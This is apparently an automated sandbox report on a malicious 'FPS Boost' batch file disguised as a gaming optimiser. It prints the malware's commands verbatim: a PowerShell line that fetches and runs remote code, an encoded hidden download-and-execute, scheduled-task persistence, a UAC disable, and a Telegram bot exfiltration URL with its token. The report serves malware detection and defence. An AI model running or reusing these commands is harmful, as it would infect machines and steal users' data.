Analysis
max time kernel: 93s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-10-2024 12:45
Static task: static1
General
Target: FPS Boost 1.bat.zip
Size: 4KB
MD5: f606e366fe37903c4c0371dac16605de
SHA1: 826e9869acc36c9f5befd821b57282720ffb4113
SHA256: a2ff096d30c78db38eaddf0629b7f26ce36b64588a2ae05b7b9c2a7e9fbe2c05
SHA512: a2cfa60e7aec6ccd4a361443d5f66d74dd7cd90bd9f0d1c5b4fda7a363988b180b645a55eec56efaea19379dfb9bceafc5d36b7b49332677c4330095bcae7555
SSDEEP: 96:d1ASURY4tkC2avn9d45zF4mc52F3UFW2dGpxzx9p+7tex3v:vUR7SC2abyc52FEFPURowx3v
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7278641970:AAEHOVYteJH3T-Bg5zEPMUSj6sdFforQUZw/sendMessag
Signatures
Detect Xworm Payload 1 IoCs
resource | yara_rule
behavioral1/memory/4172-65-0x0000021735C50000-0x0000021735C68000-memory.dmp | family_xworm
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" | reg.exe
Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "1" | reg.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | powershell.exe
Blocklisted process makes network request 4 IoCs
flow | pid | Process
33 | 3360 | powershell.exe
36 | 4172 | powershell.exe
52 | 4172 | powershell.exe
54 | 4172 | powershell.exe
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Run Powershell and hide display window.
pid | Process
4172 | powershell.exe
3604 | powershell.exe
400 | powershell.exe
2588 | powershell.exe
1088 | powershell.exe
208 | powershell.exe
3476 | powershell.exe
4560 | powershell.exe
3620 | powershell.exe
3572 | powershell.exe
688 | powershell.exe
100 | powershell.exe
4256 | powershell.exe
2344 | powershell.exe
2424 | powershell.exe
4732 | powershell.exe
2196 | powershell.exe
1848 | powershell.exe
3360 | powershell.exe
828 | powershell.exe
1276 | powershell.exe
2928 | powershell.exe
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\Drivers\etc\hosts | powershell.exe
Enumerates connected drives 3 TTPs 14 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
51 | ip-api.com
Drops file in System32 directory 13 IoCs
description | ioc | Process
File created | C:\Windows\System32\ 2 | cmd.exe
File created | C:\Windows\System32\ Game Booster | cmd.exe
File created | C:\Windows\System32\ [ | cmd.exe
File created | C:\Windows\System32\ Debloat | cmd.exe
File created | C:\Windows\System32\ [ X to go Back ] | cmd.exe
File created | C:\Windows\System32\ Version 2.0 | cmd.exe
File created | C:\Windows\System32\ _________________________________________________________________________________ | cmd.exe
File created | C:\Windows\System32\ ] | cmd.exe
File created | C:\Windows\System32\ Cleaner | cmd.exe
File created | C:\Windows\System32\ [ | cmd.exe
File created | C:\Windows\System32\ 3 | cmd.exe
File created | C:\Windows\System32\ 7 | cmd.exe
File created | C:\Windows\System32\ 1 | cmd.exe
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Delays execution with timeout.exe 1 IoCs
pid | Process
400 | timeout.exe
Kills process with taskkill 1 IoCs
pid | Process
1980 | taskkill.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | SearchApp.exe
Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Internet Explorer\GPU | SearchApp.exe
Modifies registry class 64 IoCs
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
1724  schtasks.exe
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid   Process
3360  powershell.exe
3360  powershell.exe
4172  powershell.exe
4172  powershell.exe
4172  powershell.exe
1088  powershell.exe
1088  powershell.exe
3620  powershell.exe
3620  powershell.exe
2344  powershell.exe
2344  powershell.exe
2344  powershell.exe
208   powershell.exe
208   powershell.exe
2424  powershell.exe
2424  powershell.exe
828   powershell.exe
828   powershell.exe
3476  powershell.exe
3476  powershell.exe
4560  powershell.exe
4560  powershell.exe
4732  powershell.exe
4732  powershell.exe
3572  powershell.exe
3572  powershell.exe
1276  powershell.exe
1276  powershell.exe
2196  powershell.exe
2196  powershell.exe
4256  powershell.exe
4256  powershell.exe
3604  powershell.exe
3604  powershell.exe
688   powershell.exe
688   powershell.exe
400   powershell.exe
400   powershell.exe
2928  powershell.exe
2928  powershell.exe
100   powershell.exe
100   powershell.exe
1848  powershell.exe
1848  powershell.exe
2588  powershell.exe
2588  powershell.exe
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid   Process
5108  7zFM.exe
4436  explorer.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                          pid   Process
Token: SeRestorePrivilege            5108  7zFM.exe
Token: 35                            5108  7zFM.exe
Token: SeSecurityPrivilege           5108  7zFM.exe
Token: SeDebugPrivilege              3360  powershell.exe
Token: SeDebugPrivilege              4172  powershell.exe
Token: SeIncreaseQuotaPrivilege      4392  WMIC.exe
Token: SeSecurityPrivilege           4392  WMIC.exe
Token: SeTakeOwnershipPrivilege      4392  WMIC.exe
Token: SeLoadDriverPrivilege         4392  WMIC.exe
Token: SeSystemProfilePrivilege      4392  WMIC.exe
Token: SeSystemtimePrivilege         4392  WMIC.exe
Token: SeProfSingleProcessPrivilege  4392  WMIC.exe
Token: SeIncBasePriorityPrivilege    4392  WMIC.exe
Token: SeCreatePagefilePrivilege     4392  WMIC.exe
Token: SeBackupPrivilege             4392  WMIC.exe
Token: SeRestorePrivilege            4392  WMIC.exe
Token: SeShutdownPrivilege           4392  WMIC.exe
Token: SeDebugPrivilege              4392  WMIC.exe
Token: SeSystemEnvironmentPrivilege  4392  WMIC.exe
Token: SeRemoteShutdownPrivilege     4392  WMIC.exe
Token: SeUndockPrivilege             4392  WMIC.exe
Token: SeManageVolumePrivilege       4392  WMIC.exe
Token: 33                            4392  WMIC.exe
Token: 34                            4392  WMIC.exe
Token: 35                            4392  WMIC.exe
Token: 36                            4392  WMIC.exe
Token: SeIncreaseQuotaPrivilege      4392  WMIC.exe
Token: SeSecurityPrivilege           4392  WMIC.exe
Token: SeTakeOwnershipPrivilege      4392  WMIC.exe
Token: SeLoadDriverPrivilege         4392  WMIC.exe
Token: SeSystemProfilePrivilege      4392  WMIC.exe
Token: SeSystemtimePrivilege         4392  WMIC.exe
Token: SeProfSingleProcessPrivilege  4392  WMIC.exe
Token: SeIncBasePriorityPrivilege    4392  WMIC.exe
Token: SeCreatePagefilePrivilege     4392  WMIC.exe
Token: SeBackupPrivilege             4392  WMIC.exe
Token: SeRestorePrivilege            4392  WMIC.exe
Token: SeShutdownPrivilege           4392  WMIC.exe
Token: SeDebugPrivilege              4392  WMIC.exe
Token: SeSystemEnvironmentPrivilege  4392  WMIC.exe
Token: SeRemoteShutdownPrivilege     4392  WMIC.exe
Token: SeUndockPrivilege             4392  WMIC.exe
Token: SeManageVolumePrivilege       4392  WMIC.exe
Token: 33                            4392  WMIC.exe
Token: 34                            4392  WMIC.exe
Token: 35                            4392  WMIC.exe
Token: 36                            4392  WMIC.exe
Token: SeIncreaseQuotaPrivilege      4560  WMIC.exe
Token: SeSecurityPrivilege           4560  WMIC.exe
Token: SeTakeOwnershipPrivilege      4560  WMIC.exe
Token: SeLoadDriverPrivilege         4560  WMIC.exe
Token: SeSystemProfilePrivilege      4560  WMIC.exe
Token: SeSystemtimePrivilege         4560  WMIC.exe
Token: SeProfSingleProcessPrivilege  4560  WMIC.exe
Token: SeIncBasePriorityPrivilege    4560  WMIC.exe
Token: SeCreatePagefilePrivilege     4560  WMIC.exe
Token: SeBackupPrivilege             4560  WMIC.exe
Token: SeRestorePrivilege            4560  WMIC.exe
Token: SeShutdownPrivilege           4560  WMIC.exe
Token: SeDebugPrivilege              4560  WMIC.exe
Token: SeSystemEnvironmentPrivilege  4560  WMIC.exe
Token: SeRemoteShutdownPrivilege     4560  WMIC.exe
Token: SeUndockPrivilege             4560  WMIC.exe
Token: SeManageVolumePrivilege       4560  WMIC.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid   Process       entries
5108  7zFM.exe      2
3228  explorer.exe  16
1464  explorer.exe  46
Suspicious use of SendNotifyMessage 64 IoCs
pid   Process       entries
3228  explorer.exe  12
1464  explorer.exe  27
4416  explorer.exe  25
Suspicious use of SetWindowsHookEx 11 IoCs
pid   Process
3488  StartMenuExperienceHost.exe
1248  StartMenuExperienceHost.exe
4796  SearchApp.exe
3660  StartMenuExperienceHost.exe
4700  SearchApp.exe
4392  StartMenuExperienceHost.exe
2468  SearchApp.exe
3368  StartMenuExperienceHost.exe
2648  SearchApp.exe
2880  StartMenuExperienceHost.exe
3792  SearchApp.exe
Suspicious use of WriteProcessMemory 64 IoCs
description                       pid   Process         procid_target
PID 968 wrote to memory of 1376   968   cmd.exe         100
PID 968 wrote to memory of 1376   968   cmd.exe         100
PID 968 wrote to memory of 4896   968   cmd.exe         101
PID 968 wrote to memory of 4896   968   cmd.exe         101
PID 968 wrote to memory of 3360   968   cmd.exe         102
PID 968 wrote to memory of 3360   968   cmd.exe         102
PID 3360 wrote to memory of 4056  3360  powershell.exe  103
PID 3360 wrote to memory of 4056  3360  powershell.exe  103
PID 4056 wrote to memory of 400   4056  cmd.exe         105
PID 4056 wrote to memory of 400   4056  cmd.exe         105
PID 968 wrote to memory of 1484   968   cmd.exe         106
PID 968 wrote to memory of 1484   968   cmd.exe         106
PID 968 wrote to memory of 2376   968   cmd.exe         107
PID 968 wrote to memory of 2376   968   cmd.exe         107
PID 968 wrote to memory of 3084   968   cmd.exe         108
PID 968 wrote to memory of 3084   968   cmd.exe         108
PID 968 wrote to memory of 4900   968   cmd.exe         109
PID 968 wrote to memory of 4900   968   cmd.exe         109
PID 968 wrote to memory of 4416   968   cmd.exe         110
PID 968 wrote to memory of 4416   968   cmd.exe         110
PID 968 wrote to memory of 1516   968   cmd.exe         111
PID 968 wrote to memory of 1516   968   cmd.exe         111
PID 968 wrote to memory of 4692   968   cmd.exe         112
PID 968 wrote to memory of 4692   968   cmd.exe         112
PID 968 wrote to memory of 4024   968   cmd.exe         113
PID 968 wrote to memory of 4024   968   cmd.exe         113
PID 968 wrote to memory of 1472   968   cmd.exe         114
PID 968 wrote to memory of 1472   968   cmd.exe         114
PID 968 wrote to memory of 4996   968   cmd.exe         115
PID 968 wrote to memory of 4996   968   cmd.exe         115
PID 968 wrote to memory of 4780   968   cmd.exe         116
PID 968 wrote to memory of 4780   968   cmd.exe         116
PID 968 wrote to memory of 512    968   cmd.exe         117
PID 968 wrote to memory of 512    968   cmd.exe         117
PID 968 wrote to memory of 4392   968   cmd.exe         118
PID 968 wrote to memory of 4392   968   cmd.exe         118
PID 4056 wrote to memory of 1724  4056  cmd.exe         119
PID 4056 wrote to memory of 1724  4056  cmd.exe         119
PID 4056 wrote to memory of 4504  4056  cmd.exe         120
PID 4056 wrote to memory of 4504  4056  cmd.exe         120
PID 4056 wrote to memory of 4172  4056  cmd.exe         121
PID 4056 wrote to memory of 4172  4056  cmd.exe         121
PID 968 wrote to memory of 2680   968   cmd.exe         124
PID 968 wrote to memory of 2680   968   cmd.exe         124
PID 968 wrote to memory of 1848   968   cmd.exe         125
PID 968 wrote to memory of 1848   968   cmd.exe         125
PID 968 wrote to memory of 4184   968   cmd.exe         126
PID 968 wrote to memory of 4184   968   cmd.exe         126
PID 968 wrote to memory of 1276   968   cmd.exe         127
PID 968 wrote to memory of 1276   968   cmd.exe         127
PID 968 wrote to memory of 4192   968   cmd.exe         128
PID 968 wrote to memory of 4192   968   cmd.exe         128
PID 968 wrote to memory of 4896   968   cmd.exe         129
PID 968 wrote to memory of 4896   968   cmd.exe         129
PID 968 wrote to memory of 3088   968   cmd.exe         131
PID 968 wrote to memory of 3088   968   cmd.exe         131
PID 968 wrote to memory of 872    968   cmd.exe         132
PID 968 wrote to memory of 872    968   cmd.exe         132
PID 968 wrote to memory of 2196   968   cmd.exe         133
PID 968 wrote to memory of 2196   968   cmd.exe         133
PID 968 wrote to memory of 2208   968   cmd.exe         134
PID 968 wrote to memory of 2208   968   cmd.exe         134
PID 968 wrote to memory of 4204   968   cmd.exe         135
PID 968 wrote to memory of 4204   968   cmd.exe         135
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes 1 TTPs 1 IoCs
pid   Process
4504  attrib.exe
Processes
Each entry reads: PID, image path, command line. Indentation follows the tree depth given in the report; signatures triggered by a process are listed beneath it.
PID:5108  C:\Program Files\7-Zip\7zFM.exe  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FPS Boost 1.bat.zip"
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
PID:968  C:\Windows\System32\cmd.exe  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\FPS Boost 1.bat"
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:1376  C:\Windows\system32\mode.com  mode 128,33
  PID:4896  C:\Windows\System32\reg.exe  Reg.exe query "HKU\S-1-5-19\Environment"
  PID:3360  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell -NoProfile -ExecutionPolicy Bypass "irm https://rentry.co/damnitlol/raw | iex"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4056  C:\Windows\system32\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\dwn.bat" "
      - Suspicious use of WriteProcessMemory
      PID:400  C:\Windows\System32\timeout.exe  timeout /t 1 /nobreak
        - Delays execution with timeout.exe
      PID:1724  C:\Windows\System32\schtasks.exe  schtasks /create /tn "Windows updater" /tr "C:\Users\Public\dwn.bat" /sc ONLOGON /ru Admin /f
        - Scheduled Task/Job: Scheduled Task
      PID:4504  C:\Windows\System32\attrib.exe  attrib +h "C:\Users\Public\dwn.bat"
        - Views/modifies file attributes
      PID:4172  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PoWeRsHeLL -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -e "aQByAG0AIABoAHQAdABwAHMAOgAvAC8AbQByAHAAZQBwAGUALgBwAHkAdABoAG8AbgBhAG4AeQB3AGgAZQByAGUALgBjAG8AbQAvAGEAcABpAC8AdgAxAC8AdgBpAGUAdwAvAGMAbABlAGEAbgBlAHIAIAB8ACAAaQBlAHgA"
        - UAC bypass
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Drops file in Drivers directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
  PID:1484  C:\Windows\system32\cmd.exe  C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
  PID:2376  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:3084  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Cleaner " nul
  PID:4900  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:4416  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 2 " nul
  PID:1516  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:4692  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Game Booster " nul
  PID:4024  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:1472  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 3 " nul
  PID:4996  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 7 " nul
  PID:4780  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:512   C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Debloat " nul
  PID:4392  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  PID:2680  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  PID:1848  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  PID:4184  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:1276  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 1 " nul
  PID:4192  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:4896  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Cleaner " nul
  PID:3088  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:872   C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 2 " nul
  PID:2196  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:2208  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Game Booster " nul
  PID:4204  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:4520  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 3 " nul
  PID:4336  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 7 " nul
  PID:4592  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:3276  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Debloat " nul
  PID:4424  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  PID:4392  C:\Windows\System32\Wbem\WMIC.exe  wmic process where name="javaw.exe" CALL setpriority "realtime"
    - Suspicious use of AdjustPrivilegeToken
  PID:4560  C:\Windows\System32\Wbem\WMIC.exe  wmic process where name="svchost.exe" CALL setpriority "realtime"
    - Suspicious use of AdjustPrivilegeToken
  PID:3012  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  PID:2928  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  PID:1632  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:1676  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 1 " nul
  PID:4732  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:4792  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Cleaner " nul
  PID:5020  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:2820  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 2 " nul
  PID:2036  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:1492  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Game Booster " nul
  PID:4236  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:4072  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 3 " nul
  PID:2652  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 7 " nul
  PID:5056  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:1276  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Debloat " nul
  PID:3212  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  PID:5116  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  PID:4228  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  PID:1052  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:1688  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 1 " nul
  PID:3360  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:1460  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Cleaner " nul
  PID:8     C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:4256  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 2 " nul
  PID:1216  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:4420  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Game Booster " nul
  PID:3236  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:5064  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 3 " nul
  PID:1736  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 7 " nul
  PID:2788  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:4124  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Debloat " nul
  PID:2272  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  PID:3956  C:\Windows\System32\reg.exe  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d "0" /f
  PID:2676  C:\Windows\System32\reg.exe  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t REG_DWORD /d "0" /f
  PID:1964  C:\Windows\System32\reg.exe  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableBoottrace" /t REG_DWORD /d "0" /f
  PID:2844  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " Version 2.0 " nul
  PID:3632  C:\Windows\System32\findstr.exe  findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
  PID:1996  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:3468  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 1 " nul
  PID:4056  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:1564  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Cleaner " nul
  PID:400   C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:1572  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 2 " nul
  PID:1324  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:3880  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Game Booster " nul
  PID:2776  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ " nul
  PID:2852  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 3 " nul
  PID:2848  C:\Windows\System32\findstr.exe  findstr /v /a:B /R "^$" " 7 " nul
  PID:1676  C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " ] " nul
  PID:2112  C:\Windows\System32\findstr.exe  findstr /v /a:F /R "^$" " Debloat " nul
  PID:100   C:\Windows\System32\findstr.exe  findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
  PID:1088  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *3DBuilder* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:3620  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *Getstarted* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:2344  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *WindowsAlarms* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:208   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *WindowsCamera* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:2424  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *bing* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:828   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *MicrosoftOfficeHub* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:3476  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *OneNote* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:4560  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *people* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:4732  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *WindowsPhone* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:3572  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *solit* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
  PID:1276  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PowerShell -Command "Get-AppxPackage *WindowsSoundRecorder* | Remove-AppxPackage"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
